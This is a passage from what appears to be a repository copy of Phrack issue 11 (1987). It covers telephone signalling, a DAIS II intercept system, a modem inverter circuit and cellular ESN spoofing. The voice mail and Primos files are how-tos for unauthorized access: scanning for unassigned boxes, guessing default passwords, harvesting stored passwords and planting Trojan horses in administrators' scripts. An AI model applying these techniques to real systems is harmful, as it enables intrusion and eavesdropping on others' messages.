= If you have any questions or comments, please leave mail =
= either on Phreak Klass Room 2600 or at 214-733-5283. =
============================================================
= (c) The Executioner/PLP/TNT =
============================================================

101
phrack11/4.txt Normal file
View file

@ -0,0 +1,101 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #4 of 12
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+=+ Hacking Voice Mail Systems +=+
+=+ Written for Phrack XI +=+
+=+ by:-> Black Knight from 713 +=+
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Voice Mail is a relatively new concept and not much has been said about it.
It is a very useful tool for the business person and the phreak. The way it
works is that somebody wishing to get in touch with you calls a number,
usually a 1-800, and punches in on his touch-pad your mailbox number and then
he is able to leave a message for you. Business experts report that this
almost totally eliminates telephone tag. When a person wishes to pick up his
message all he needs to do is call the number enter a certain code and he can
hear his messages, transfer them, and do other misc. mailbox utilities.
Most VMSs are similar in the way they work. There are a few different ways
the VMSs store the voice. One way is that the voice is recorded digitally and
compressed and when heard it is reproduced back into the voice that recorded
it. Another method that is slower and uses more space, but costs less, stores
the voice on magnetic tape, the same type that is used to store data on a
computer, and then runs the tape at a slow speed. Using this method the voice
does not need to be reproduced in any way and will sound normal as long as the
tape is running at a constant speed. On some of the newer VMSs the voice is
digitally recorded and is transformed from the magnetic tape at about 2400
bits per second.
There are many different types and versions of voice mail systems. Some of
the best and easiest to get on will be discussed.
Centagram
---------
These are direct dial (you don't have to enter a box number). To get on one
of these, first have a number to any box on the system. All of the other
boxes will be on the same prefix; just start scanning them until you find one
that has a message saying that person you are calling is not available. This
usually means that the box has not been assigned to anybody yet. Before the
nice lady's voice tells you to leave the message, hit #. You will then be
prompted for your password. The password will usually be the same as the last
four digits of the box's number or a simple number like 1000, 2000, etc. Once
you get on, they are very user friendly and will prompt you with a menu of
options. If you can't find any empty boxes or want to do more, you can hack
but the system administrators box, which will usually be 9999 on the same
prefix as the other boxes, will allow you to hear anybody's messages and
create and delete boxes.
Sperry Link
-----------
These systems are very nice. They will usually be found on an 800 number.
These are one of the hardest to get a box on because you must hack out a user
ID (different from the person's box number) and a password. When it answers,
if it says, "This is a Sperry Link voice station. Please enter your user ID,"
you will have to start trying to find a valid user ID. On most Sperrys it
will be a five digit number. If it answers and says, "This is an X answering
service," you first have to hit *# to get the user number prompt. Once you
get a valid user number will have to guess the password on most systems, it
will be 4 digits. Once you get in, these are also very user friendly and have
many different options available.
RSVP
----
This is probably one of the worst VMSs but it is by far the easiest to get
yourself a box. When it answers you can hit * for a directory of the boxes on
it (it will only hold 23). If you hit # you will be given a menu of options
and when you choose an option you will then be prompted for your ID number.
The ID number on an RSVP system will just about always be the same as the
mailbox number, which are always only 2 digits.
A.S.P.E.N.
----------
The Aspen voice message systems made by Octel Telecommunications is in my
opinion the BEST VMS made. To get a box on an Aspen, you need to find an
empty box. To find an empty box, scan the box numbers and if one says, "You
entered XXXX. Please leave a message at the tone," then this is an empty box.
You next just press # and when prompted for your box number enter the number
of the empty box and friendly voice of the nice lady will guide you through
all of the steps of setting up your box. She first tells you what you can do
with the box and then will prompt you with, "Please enter the temporary
password assigned to you by your system manager." This password will usually
be 4 digits long and the same as the box number like 1000, etc. Once you get
on their are many things you can do. You can make a distribution list where
if you want to leave a certain message to more than one person, you can enter
the list number and all of the boxes on the list will get the message. You can
also have the system call you and notify you that you have new messages. These
systems also have what they call "Information center mailboxes" that are
listen only and can also have a password on them so the person calling has to
enter the password before he hears the greeting message. Aspen VMSs have a
system managers mailbox that will just about give you total control of the
whole system and let you listen to people's mail, create and delete boxes, and
many other things.
Thank you for reading this file and if you would like to get in touch with me
VIA VOICE MAIL call 1-800-222-0311 and hit *2155.
//--Black Knight from 713--\\
| for PHRACK XI (1987) |
\\--++--++--++--++--++--++-//

97
phrack11/5.txt Normal file
View file

@ -0,0 +1,97 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #5 of 12
{Simple Data Encryption}
<or digital electronics 101>
By:{The Leftist}
Prologue:
Well, it's been awhile since I've done one of my activities files. This time
I've switched from chemistry to electronics. Hopefully, I will be writing
more files similar to this one. Also, I have devised a more sophisticated
encryption device, which I may release in the future
Do you run a BBS, living in fear that the "feds" are gonna log on, and fool
you into giving them a password? Do you wish that you could limit exactly WHO
logs onto your board? Well, this file is just for you..
Parts:
1:9 volt battery
1: 74hc/hct04 cmos hex inverter <about .50 cents>
Some basic knowledge of electronics might help, and some wire would be helpful
too. If you want to be fancy you can even splurge and get a 9 volt connector.
Note: Although it is not required that you put this on an etched PC board, you
can do this quite easily, and it makes for a much cleaner job.
Ok, the basic idea behind this scheme is this:
Data coming to and going from your modem is translated as 1's and 0's. This
represents highs and lows, which translate out to code which your computer
recognizes as valid data. Now, if you could switch all those 1's to 0's, and
0's to 1's, then you would have a simple way of encrypting your data. That's
exactly what the hex inverter does. If it sees a 0, it makes it a 1. If it
sees a 1, it makes it a 0. So, what you want to do is have an inverter on your
send line, and an inverter on your receive line. The computer you are
connected to must also have inverters on its send and receive, or all you will
see will be garbage! I tried to be as non-technical as possible in this for
all you non-technical types out there.
Connections:
Hold the chip, and look at it. There should be a little notch in one end. Hold
it as illustrated in the schematic:
(80 columns)
______________________________
| |
14 13 11 12 10 9 8 |
| | | | | | | |
__________________ |
| | |_ to positive on battery
\ 74hc/hct04 |
/ |
|__________________| to negative on battery
| | | | | | | |
1 2 3 4 5 6 7______________|
| | | |
| | | |_________________________________to computer port
| | |_______________________________from modem
| |________________________________________________to modem conn.
|________________________________________________ from computer port
<all other pins are not connected>
Ok, hook the + 9volts up to pin 14, and the negative up to pin 7.
There are 6 inverters on this chip. For this, we will be using only 2 of them.
Find the wire coming from your computer to the send data line on your modem.
Sever this wire, and hook one side of it to pin 1. Hook the other end of it to
pin 2. Next, find the receive data line, and sever it. Hook one end of it to
pin 3, the other end to pin 4. That's about it.. if you want to use the other
inverters on the chip, here's the complete pinouts.
Pin# Name and function
---- -----------------
1,3,5,9,11,13 Data inputs
---------------------------------
2,4,6,8,10,12 Data outputs
---------------------------------
7 Ground
---------------------------------
14 VCC
---------------------------------
Remember, that your BBS modem must have one of these devices on it, as well as
the user calling. I have tested this on Smartmodems, and it does work. If you
have an internal modem, this may be a little difficult for you.

270
phrack11/6.txt Normal file
View file

@ -0,0 +1,270 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #6 of 12
Taran King Presents...
AIS - Automatic Intercept System
The DAIS II System by Computer Consoles Incorporated
INTRODUCTION...
~~~~~~~~~~~~~~~
Computer Consoles Incorporated (CCI) manufactures various hardware
appliances to be used in conjunction with phone companies switches as well as
other aspects of the companies' uses, plus computer systems such as their own
Unix-supporting systems.
DAIS II is the Distributed Automatic Intercept System, which is the
system used to announce if the subscriber has dialed a non-working number.
This is what you hear, in action, when you dial a wrong number and get the 3
tones plus the announcement or the ONI (Operator Number Identification)
intercept operator ("What number did you dial?").
The information from this file comes mostly from an instructional
manual sent to me by CCI, who can be reached at 800-833-7477 or 716-482-5000
directly, or may be written to at 97 Humbolt Street, Rochester, NY, 14609.
INTERCEPTION
~~~~~~~~~~~~
Most definitely any person who has used a telephone in his life has,
by some means or another, come across the dreaded 3 tones, leading up to the
ever-so-cumbersome announcement telling of the disconnected or non-working
number. This file will go into how the whole system works.
After dialing the non-working number, the telco's Class 5 End Office
routes the call to DAIS II.
ANI Calls
~~~~~~~~~
Provided that the End Office has Automatic Number Identification
(ANI) equipment, the equipment then identifies the digits of the called number
and sends them to the intercept system.
The system receives the called number from the end office, retrieves
information for that number from the intercept database, formulates the
message, and delivers it to the customer in an automated announcement. These
announcements can either be standardized or tailored to the independent
telephone companies' needs. If further assistance is required, the caller can
then stay on the line and wait for an operator to come onto the line.
ONI Calls
~~~~~~~~~
When the End Office is primitive, and they don't have the ANI
equipment to do the above ritual, operators are directly involved. These
operators are also called into action when there is an ANI or DAIS II failure.
When the ONI (Operator Number Identification) call comes in, DAIS II
routes the call to the operator. The operator asks for the number that the
customer called and then keys it into her KDT (Keyboard Display Terminal).
After she hits the command key, the number's information is searched for in
the intercept database, the message is formulated, and the automated response
is announced. Once again, if the caller needs further assistance, an operator
will return to the line to help the subscriber.
Operators will return to the line for any number of reasons. They
include the following:
Unsuccessful Searches - After DAIS II receives the called number from ANI
equipment or from an operator, it searches the
database to find the intercept message associated with
the telephone number. The database contains all
10,000 line numbers for each exchange in the calling
area. If the system cannot complete the search, the
number was either keyed in incorrectly or there is a
problem in the system. The call is then routed to an
operator and displays the intercepted number
(including NPA) on the KDT screen along with a message
indicating why the search could not be completed. If
the number was keyed in wrong, the operator will
correct the number, or else she will ask the
subscriber to re-dial the number.
Aborted Announcements - If a search is given successful but for one reason or
another the automated announcement cannot be given,
the call is routed to an operator. The KDT display
shows the intercepted number, the appropriate
information for a verbal response, and the message,
"VERBAL REPORT." In this case, the operator quotes
the message to the caller rather than activating the
automated response.
Reconnects - If a customer remains on the line for more information
after receiving the automated announcement, the system
routes the call to an operator. The operator's KDT
display shows the called number plus other pertinent
information given to the caller in the previous
announcement. From here, the operator can respond
verbally to the customer's needs, or activate the
automated system again. The DAIS II system allows up
to 4 reconnects per call, but the possible number of
reconnects available ranges from 0-3. With 1
reconnect, the operator must report verbally.
Split Referrals - If a number has been changed but replaced with two
numbers, this is called a "split referral." When the
database finds 2 or more numbers, the DAIS II system
routes the customer to an operator, displaying the old
number and new listings on the KDT screen. The
operator then asks which number they are looking for
and keys in the command key to activate the
announcement, or else they do the announcement
verbally.
Operator Searches
~~~~~~~~~~~~~~~~~
Situations may arise where the subscriber needs more information
than was given by the automated announcement, or believes the information to
be invalid. DAIS II provides for operators to have access to both the
intercept and the DA databases at all times as long as the system
administrator, who judges the extent to which operators can use the
cross-search capability, allows it.
Components Of The System
~~~~~~~~~~~~~~~~~~~~~~~~
The telco's Class 5 End Offices contain switching equipment that
routes calls to DAIS II. If the office has ANI equipment, the switch routes
the called digits to the intercept system in the form of multi-frequency
tones. The end offices route calls to DAIS II on dedicated (direct) trunks.
These direct trunks can carry ANI traffic or ONI traffic, but not both.
If trunk concentrators are used, the concentrator trunks to DAIS II
may carry ANI calls, ONI calls, or both, depending on the types of trunks
coming into the concentrators from the end offices. The call is identified as
ANI or ONI through MF tones transmitted by the concentrators.
If an operator must be involved (due to ONI or further assistance),
DAIS II routes the call to the telco's ACD (Automatic Call Distributor), which
is a switching device that routes calls to any available operator.
The intercept data base resides on disk in the ARS (Audio Response
System). ARS processors known as Audio Response Controllers (ARCs) search the
intercept database. If a call requires an operator's services, the Marker
Decoder Unit (MDU) provides ACD routing information to the ARC.
The DAIS II Automatic Intercept Communications Controllers (AICCs)
route messages between the ARCs and the DAIS II subsystems. An intercept
subsystem that is housed at the same location as the database is called a
Colocated Automated Intercept System (CAIS). A subsystem located at a
distance from the database is known as a Local Automated Intercept System
(LAIS). Each subsystem can provide automated announcements without using
expensive trunking to route ANI calls to a centralized intercept office. Only
calls that require operator assistance are routed on trunks to the ARS site.
Because those trunks are only held white the operator identifies the number
and are released before the announcement begins, trunk requirements are
reduced. The automated announcement is always given by the intercept
subsystem.
Each CAIS or LAIS site contains a Trunk Time Switch (TTS) and DAIS II
Audio Response Units (DARUs). Intercept trunks from the concentrators and the
Class 5 End Offices terminate at the TTS. When an ONI call comes in on one of
these trunks, the TTS routes it to the ACD. When an ANI call comes in, the
TTS routes the called number to the ARC. After the ARC retrieves the
appropriate message from the database, it sends that information back to the
TTS, which connects a DARU port to the trunk on which the call came in. Then,
the DARU produces an automated announcement of the message and delivers it to
the caller. ARS hardware generates only DA announcements whereas DAIS II
hardware generates only intercept announcements.
Automatic Intercept Communications Controller (AICC)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The AICC routes messages between the ARC and the TTS. Two units are
required to enhance system reliability. Each pair of AICCs can communicate
with up to 4 CAIS or LAIS subsystems.
The AICCs are similar to the Audio Communications Controllers (ACCs)
in the ARS system, but AICCs use a Bisynchronous Communications Module (BSCM)
instead of a LACIM.
An AICC can be equipped with up to 8 BSCMs, each of which handles one
synchronous communication line to the TTS. The BSCM models selected depend on
the location of the AICC with respect to the CAIS/LAIS sites. Standard SLIMs
(Subscriber Line Interface Modules) are required for communication with the
ARC.
Trunk Time Switch (TTS)
~~~~~~~~~~~~~~~~~~~~~~~
The TTS has two types of components: the Peripheral Modules (PMs) and
the Common Controls (CCs).
The PM contains the printed circuit boards that provide the link
between the end office's ANI trunks and the ARC and between the ONI trunks and
the ACD. The activity of the PM is under direction of the CC
A PM rack contains five types of circuit boards: Multi-frequency
Receivers (MFRs), Analog Line Front Ends (ALFEs), T1 Front Ends (T1FEs),
Peripheral Module Access Controllers (PMACs), and Multi-purpose Peripheral
Devices (MPPDs).
The MFRs translate the intercepted number from multi-frequency tones
to ASCII digits for ANI calls; for ONI calls that come through a trunk
concentrator, the MFRs translate the tones sent by the concentrator to
indicate an ONI call. Based on the tones, the MFR determines the type of
call: regular, trouble, etc.
ALFEs convert incoming analog data to digital form so that it can be
switched on the digital network. They also convert outgoing digital data back
to analog. Incoming ALFEs provide the link between the TTS and the analog
trunks from the Class 5 End Offices. Outgoing ALFEs provide the link between
the TTS and the analog trunks to the ACD.
ALFE is subdivided into two types for both incoming and outgoing:
ALFE-A (contains the control logic, PCM bus termination, and ports for 8
trunks) and ALFE-B (contains ports for 16 trunks, but must be paired with an
ALFE-A in order to use the control logic and PCM bus on the backplane).
ALFE-As can be used without ALFE-Bs, but not vice versa.
Incoming ALFEs support E&M 2-wire, E&M 4-wire, reverse battery, and
3-way signalling trunks. Outgoing ALFEs support E&M 2-wire, reverse battery,
and high-low trunking.
T1FEs provide the links between the TTS and the D3-type T1 spans from
the end offices. They also link the DARU VOCAL board ports and the TTS. Each
board has 24 ports in order to handle a single T1 span which carries 24 voice
channels.
PMAC is based on a Motorola 68000 microprocessor that directs and
coordinates data flow within the PM.
MPPD boards provide bus termination and the system clocks for the
digital network. The MPPD contains a master and a secondary clock, which are
synchronized with the frequency of an incoming T-1 span. The module also
contains its own clock for use when T-1 synchronization is not available or
lost.
The MPPD also generates the ringing tones, busy signals, and reorder
tones heard by the customer and sends the zip (alert) tone to the operator.
The CC controls the interaction between the PM components and the
DARU. It contains the Office Dependent Data Base (ODDB), which is a system
table that describes the configuration of the TTS. The CC uses the ODDB to
determine whether an incoming call is an ANI or ONI trunk.
The CC sets up paths through the digital network in order to
coordinate the resources of the CAIS/LAIS. It receives messages from the
PMAC, stores information necessary for returning a response to the appropriate
trunk, and controls message routing to and from the ARC or the operator. It
also synchronizes the TTS and the Directory Assistance System (DAS) for
operator-caller communications.
The CC is a Power-series standalone processor that contains a central
processing unit (CPU-2), based on the Motorola 68000 microprocessor. The
processor also contains distributed intelligence for controlling the memory
subsystem, the IO (input/output) subsystem, and the disk/tape subsystem. Each
CC includes a Winchester disk drive, a quarter-inch tape drive, and additional
miscellaneous hardware.
DAIS II Audio Response Unit (DARU)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DARU contains the VOCAL boards that produce automated
announcements, which are compiled from a vocabulary stored in RAM. A
CAIS/LAIS contains 1 to 3 DARUs, each with 48 ports.
If a CAIS/LAIS houses more than one DARU, the units are multi-dropped
together. One DARU is always linked to the ARCs (either directly or by modems
and telephone lines) so that the announcement vocabulary can be downloaded
from the ARCs if necessary.
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
Much of the information in this file is copied verbatim from the
instructional booklet sent to me by CCI. Their documentation is extremely
in-depth and well written, and, with some looking over, is easy to
understand. Much of the information in here is confusing with all of the
acronyms used as well as technical terms, but if you cross-reference acronyms
throughout the file, you should be able to see what it stands for. Also, if
you don't understand what something does, just think of it in terms of use by
the telephone company in the context used and you can generally get an idea
of what it does or is used for. I hope you enjoyed this file and continue to
read Phrack Inc. files to learn more about the system we use and experience.
Any constructive suggestions are welcomed directly or indirectly.
Taran King
:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:

209
phrack11/7.txt Normal file
View file

@ -0,0 +1,209 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #7 of 12
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
! !
# Hacking Primos I, II, III #
! !
# (I&II Revised) #
! !
# By Evil Jay #
! !
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
Author Note:
Ugg! I looked at my first file after it was released and saw a lot of
misspellings, errors and other screw-ups and was completely embarrassed. I
did not have time to edit the file and I was also writing the second file
which dealt with gaining privileges. I threw these two files at Taran King
who in turn merged them together. So I humbly apologize for all of the
errors in the last file. In this file I will revise the old file and
continue with some more methods of gaining access and also list out some
very basic commands for beginners. As I said before, if you have any
questions you can reach me on any board I am currently inhabiting. Hope to
hear from you...
*** Gaining Access From Scratch ***
I made a mistake in my last file and stated that FAM was not a default. FAM
is a default, but it can be taken out by the system administrators.
To get a listing of every possible account on a system, it is really quite
easy. They are located in the MFD directories. Type:
A MFD <MFD #> (Without the "<" and ">" signs)
Or just:
A MFD
Then type LD and hit return. Now, you will see a listing of files and
underneath should be a listing of directories appropriately named
Directories. These directories are valid User IDs. However, I believe that
directories that have an "*" character in them cannot be logged in to.
*** Getting Higher Access Revised ***
SYS1 is the highest system level there is. Meaning unless commands have to
be entered from the supervisors terminal, you can usually do anything with an
account that has SYS1 access. Also, I should clarify that SYS1 will not
always be the name of the highest access available. It could be named SYSTEM
or anything for that matter.
You are looking for a file with the extension .CPL - look for this file
under any of the SYS1 directories. When you find one, SLIST it. You are
looking for a line similar to:
A <DIRECTORY NAME> <PASSWORD>
It could look like:
A LIB XXX
LIB is the directory (user id) name.
XXX is the password to that directory (user id).
When you have this, log into that account with the directory name and
password. If your lucky you'll gain access to that account. I have noticed
that a lot of high access accounts sometimes have the password XXXXXX or X.
Try these, I am unsure as to whether they are actual defaults or not.
Ah, the revision is done! Now some more ways to gain access...
*** The Trojan Horse ***
Providing you have access, you may or may not be able to edit a file in a
high access directory. If you can't then try the above technique and try to
hack a higher level account.
You will first want to learn the Command Processing Language (CPL). Type
HELP CPL for a list of commands and then play around and try to write your
own programs. If you don't have a manual handy, look at other CPL programs in
other directories you can access. Once you know CPL, all you have to do is
edit a CPL file in a high access dir. Add your own high level commands to the
program. Then replace the old file, logoff and wait until the operator(s)
decide to run your program. Hopefully, if everything goes well your routines
will help you with whatever you wanted. However it would be a good idea to
have your TH write a file to your directory telling you whether it has been
ran or not. I will discuss different Trojan Horses in later issues of Phrack.
Once on a Prime it is pretty easy to get other accounts so don't worry about
it. Just worry about getting on in the first place. Patience is definitely
required since many systems (particularly versions 19 up) tend to hang up
after the first invalid id/password combo.
*** Basic Commands For Beginners ***
This is a list of basic commands you can use once on a Prime system. I will
not go in-depth on a command, because you can do that for yourself by
typing:
HELP <COMMAND NAME>
SLIST <FILENAME>
This will list out the contents of a file on a directory. Type in the full
file name (plus extension).
ATTACH <DIRECTORY NAME>
This will attach you to another directory. For a full explanation type HELP
ATTACH.
LD
This will list all the files and subdirectories in a directory.
RLS -ALL
Commands add up on the stack, and eventually after a pre-determined amount of
commands you will get a message telling you that you are "now at command level
XX". This command will release all those pent up commands in the stack.
CPL <FILENAME>
This will run a file with the extension ".CPL".
COMINPUT <FILENAME>
This will run a file with the extension ".COM"
SEG <FILENAME>
This will run a file with the extension ".SEG"
STATUS USERS
This will give you a listing of users and other information currently on the
system.
STATUS
This will give you the status of the system and other information.
EDIT (Or ED)
This is a text editor.
CHANGE_PASSWORD <OLD PASSWORD>
Does just what it says it does.
DELETE <FILENAME>
Deletes a file.
LOGOFF
I think this is pretty obvious.
LOGIN
This will log you out and take you back to the login process, providing there
is no logins-over-logins set by the administrators.
This is a very small list, but will probably help the beginner greatly when
he/she first logs on. Hope you enjoyed this issue...Look for Hacking Primos
Part IV in Phrack, 12. Mebbe'.
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
! !
# A Phrack,Inc #
! !
# Presentation #
! !
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
=========================================================================

143
phrack11/8.txt Normal file
View file

@ -0,0 +1,143 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #8 of 12
Telephone Signalling Methods
----------------------------
Written by Doom Prophet
This file explains the basic signalling methods in use by the telephone
system and is intended for general understanding. The text that follows is not
highly technical since this file is for basic understanding and aimed at less
experienced phreaks. Still, the more experienced readers may want to read it
as a review on the information.
Analog--Analog signals are those that have continuously and smoothly
varying amplitude or frequency. Speech signals are of this type when you
consider tone, pitch and volume levels that vary according to the person
speaking. When a person speaks into the transmitter on a telephone, the voice
signals are made up of acoustical energy, which are then converted into
electrical energy for transmission along a transmission medium.
Analog carrier facilities may operate over different media, such as wire
lines, multi-wire cable, coaxial cable, or fiber optic cable. Copper wire is
the most commonly used for subscriber loops.
A technique that allows for many signals to be sent along the same
transmission path is called Multiplexing. Analog signals use Frequency
Division Multiplexing or FDM.
Digital--Instead of the voice signal being processed as an analog signal,
it is converted into a digital signal and handled with digital circuits
throughout the transmission process. When it arrives at the CO that serves the
called telephone, it is converted back to analog to reproduce the original
voice transmission.
Pulse Code Modulation or PCM is when the binary signal is transmitted in
serial form. Binary coding represents bits or binary digits at 0 and 1 levels.
These levels have a definite time relationship with one another. Time Division
Multiplexing or TDM is the type of multiplexing, sometimes abbreviated as MUX,
done for digital transmission.
Metallic--Metallic facilities carry only one Voice Frequency (VF) channel.
Typically, a metallic facility is used to connect business or residential
lines to a CO. Coaxial cable can be used to transmit both Analog and Digital
signals as well as Metallic signals.
VF channels have a 4000 Hz bandwidth, from 0 to 4000 Hz. However, the
in-band range of the voice frequency is between 200 and 3400 Hz. Signals that
are out of this frequency range but still within the VF channel are out of
band signals. A supervisory equivalent to 2600 for out of band is 3700 Hz. The
amount of VF channels vary according to the transmission facilities that are
being used.
CCIS (Common Channel Interoffice Signalling) is where control or
supervisory signals are sent on a separate data link between switching
offices. CCIS links operate at 4800 bps, or baud. Signal Transfer Points in
the switch send the supervisory information over the dedicated link. This
prevents supervisory tones from subscriber stations to register with the
telephone network as a change in trunk status.
Reverse Battery Signalling- When the called end answers, the polarity and
condition of the Ring and Tip leads is reversed to indicate the status of the
connection. Conditions for a call being placed, but not yet answered, is
ground on the Tip and battery (the CO battery current is flowing through) on
the Ring. When the called party answers, by the action of relays in the
switching equipment, current is reversed in the calling subscriber loop and
battery is placed on the Tip and ground on the Ring, which remains during the
talking.
E and M- Leads connecting switching equipment to trunk circuits are termed
the E and M leads, for receive and transmit. The E lead reflects the far-end
or terminating end condition of the trunk. Ground on the E lead indicates that
a signal has been received from the other end. The E lead is open when the
trunk is idle. The M lead reflects the the near end condition of the trunk. It
is grounded when the trunk is idle, and goes to battery condition when the
called party goes off hook. Long interoffice and short haul toll trunks use
this signalling method.
It should be noted that AC signalling is Alternating Current, and is used
on the intertoll network, and interoffice and short haul toll trunks. DC, or
direct current, is used on two wire or intraoffice connections, and local
interoffice trunks.
Single Frequency (SF)- Single Frequency is an in-band 2600 Hz signalling
system. When a four wire trunk is idle, and is equipped for SF in band
signalling, a 2600 Hz tone is being transmitted in both directions. When the
trunk is seized at an originating position, the M lead is changed from ground
to battery state. This removes the 2600 Hz supervisory tone from the outgoing
trunk pair. The loss of the 2600 Hz will be detected at the far end by the SF
signalling unit, changing the far end E lead condition from open to ground,
causing switching equipment to function. When ground is restored to the M
lead, replacing 2600 on the near end trunk, the pulsing of address information
begins.
Multi-Frequency (MF)- The MF pulsing method uses AC signals in the voice
frequency range, and transmits address information between COs by combinations
of only 2 of 5 frequencies. MF is used for the sending of address information,
as mentioned before. Other signalling methods are still required for trunk
control and supervision. There are six MFs comprising MF codes. These are 200
Hz apart in the 700-1700 range. Two frequencies are sent at once, thus
explaining the term 'Multi frequency.'
MF pulsing is initiated by manual keysets and the TSPS switchboard, or by
MF outpulsing senders in ESS and Xbar. MF pulsing is very rapid and only
occurs when a connection is being established. KPs, or Key Pulses, are used as
a signal to start MF pulsing. STs, or STart tones are used as a signal to
indicate the end of MF pulsing.
As an example of MF signalling, take a toll switchboard trunk connected to
a Xbar Central Office. The operator selects an idle trunk, and presses the KP
button on the keyset to signal the distant sender or register link equipment
to connect to a MF receiver. The S lamp on the keyset will light when the far
end is ready to receive MF pulses. After keypulsing the digits of the called
number, the operator presses the ST button, which indicates the end of pulsing
and disconnects the keyset from the operator's cord circuit and extinguishes
the KP and S lamps.
At the terminating CO, the two MF tones of each digit are amplified and
limited in the MF receiver unit associated with the incoming sender and
register circuit. The frequencies are selected by channel filters in the MF
receiver and then detected. The DC voltage that results will operate the
proper channel relays to continue with the process of placing the call.

280
phrack11/9.txt Normal file
View file

@ -0,0 +1,280 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #9 of 12
--------------------------------------------------------------------------
The following is reprinted from the November 1985 issue of Personal
Communications Technology magazine by permission of the authors and
the publisher, FutureComm Publications Inc., 4005 Williamsburg Ct.,
Fairfax, VA 22032, 703/352-1200.
Copyright 1985 by FutureComm Publications Inc. All rights reserved.
--------------------------------------------------------------------------
THE ELECTRONIC SERIAL NUMBER: A CELLULAR 'SIEVE'?
'SPOOFERS' CAN DEFRAUD USERS AND CARRIERS
by Geoffrey S. Goodfellow, Robert N. Jesse, and Andrew H. Lamothe, Jr.
What's the greatest security problem with cellular phones? Is it privacy of
communications? No.
Although privacy is a concern, it will pale beside an even greater problem:
spoofing.
'Spoofing' is the process through which an agent (the 'spoofer') pretends to
be somebody he isn't by proffering false identification, usually with intent
to defraud. This deception, which cannot be protected against using the
current U.S. cellular standards, has the potential to create a serious
problem--unless the industry takes steps to correct some loopholes in the
present cellular standards.
Compared to spoofing, the common security concern of privacy is not so severe.
Most cellular subscribers would, at worst, be irked by having their
conversational privacy violated. A smaller number of users might actually
suffer business or personal harm if their confidential exchanges were
compromised. For them, voice encryption equipment is becoming increasingly
available if they are willing to pay the price for it.
Thus, even though technology is available now to prevent an interloper from
overhearing sensitive conversations, cellular systems cannot--at any
cost--prevent pirates from charging calls to any account. This predicament is
not new to the industry. Even though cellular provides a modern,
sophisticated quality mobile communications service, it is not fundamentally
much safer than older forms of mobile telephony.
History of Spoofing Vulnerability
The earliest form of mobile telephony, unsquelched manual Mobile Telephone
Service (MTS), was vulnerable to interception and eavesdropping. To place a
call, the user listened for a free channel. When he found one, he would key
his microphone to ask for service: 'Operator, this is Mobile 1234; may I
please have 555-7890.' The operator knew to submit a billing ticket for
account number 1234 to pay for the call. So did anybody else listening to the
channel--hence the potential for spoofing and fraud.
Squelched channel MTS hid the problem only slightly because users ordinarily
didn't overhear channels being used by other parties. Fraud was still easy
for those who turned off the squelch long enough to overhear account numbers.
Direct-dial mobile telephone services such as Improved Mobile Telephone
Service (IMTS) obscured the problem a bit more because subscriber
identification was made automatically rather than by spoken exchange between
caller and operator. Each time a user originated a call, the mobile telephone
transmitted its identification number to the serving base station using some
form of Audio Frequency Shift Keying (AFSK), which was not so easy for
eavesdroppers to understand.
Committing fraud under IMTS required modification of the mobile--restrapping
of jumpers in the radio unit, or operating magic keyboard combinations in
later units--to reprogram the unit to transmit an unauthorized identification
number. Some mobile control heads even had convenient thumb wheel switches
installed on them to facilitate easy and frequent ANI (Automatic Number
Identification) changes.
Cellular Evolution
Cellular has evolved considerably from these previous systems. Signaling
between mobile and base stations uses high-speed digital techniques and
involves many different types of digital messages. As before, the cellular
phone contains its own Mobile Identification Number (MIN), which is programmed
by the seller or service shop and can be changed when, for example, the phones
sold to a new user. In addition, the U.S. cellular standard incorporates a
second number, the 'Electronic Serial Number' (ESN), which is intended to
uniquely and permanently identify the mobile unit.
According to the Electronic Industries Association (EIA) Interim Standard
IS-3-B, Cellular System Mobile Station--Land Station Compatibility
Specification (July 1984), 'The serial number is a 32-bit binary number that
uniquely identifies a mobile station to any cellular system. It must be
factory-set and not readily alterable in the field. The circuitry that
provides the serial number must be isolated from fraudulent contact and
tampering. Attempts to change the serial number circuitry should render the
mobile station inoperative.'
The ESN was intended to solve two problems the industry observed with its
older systems.
First, the number of subscribers that older systems could support fell far
short of the demand in some areas, leading groups of users to share a single
mobile number (fraudulently) by setting several phones to send the same
identification. Carriers lost individual user accountability and their means
of predicting and controlling traffic on their systems.
Second, systems had no way of automatically detecting use of stolen equipment
because thieves could easily change the transmitted identification.
In theory, the required properties of the ESN allow cellular systems to check
to ensure that only the correctly registered unit uses a particular MIN, and
the ESNs of stolen units can be permanently denied service ('hot-listed').
This measure is an improvement over the older systems, but vulnerabilities
remain.
Ease of ESN Tampering
Although the concept of the unalterable ESN is laudable in theory, weaknesses
are apparent in practice. Many cellular phones are not constructed so that
'attempts to change the serial number circuitry renders the mobile station
inoperative.' We have personally witnessed the trivial swapping of one ESN
chip for another in a unit that functioned flawlessly after the switch was
made.
Where can ESN chips be obtained to perform such a swap? We know of one recent
case in the Washington, D.C. area in which an ESN was 'bought' from a local
service shop employee in exchange for one-half gram of cocaine. Making the
matter simpler, most manufacturers are using industry standard Read-Only
Memory (ROM) chips for their ESNs, which are easily bought and programmed or
copied.
Similarly, in the spirit of research, a west coast cellular carrier copied the
ESN from one manufacturer's unit to another one of the same type and
model--thus creating two units with the exact same identity.
The ESN Bulletin Board
For many phones, ESN chips are easy to obtain, program, and install. How does
a potential bootlegger know which numbers to use? Remember that to obtain
service from a system, a cellular unit must transmit a valid MIN (telephone
number) and (usually) the corresponding serial number stored in the cellular
switch's database.
